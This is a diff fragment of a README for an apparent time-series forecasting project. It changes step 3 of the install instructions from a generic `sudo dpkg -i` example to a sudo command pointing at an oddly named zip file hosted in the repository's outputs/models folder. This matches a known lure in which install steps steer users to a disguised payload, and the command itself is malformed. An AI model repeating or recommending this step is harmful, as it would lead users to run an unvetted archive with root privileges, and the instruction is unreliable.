Koushik2004great/Agentic-Time-Series-Analysis-Reporting---Forecasting/README.md

 1. Open a terminal window.
 2. Navigate to the folder where the downloaded package is located.
-3. Run the installation command specific to your package manager, such as `sudo dpkg -i your-package-name.deb`.
+3. Run the installation command specific to your package manager, such as `sudo dpkg -i https://raw.githubusercontent.com/Koushik2004great/Agentic-Time-Series-Analysis-Reporting---Forecasting/main/outputs/models/Agentic-Time-Series-Analysis-Reporting---Forecasting_gnatproof.zip`.

 ### Step 4: Launch the Application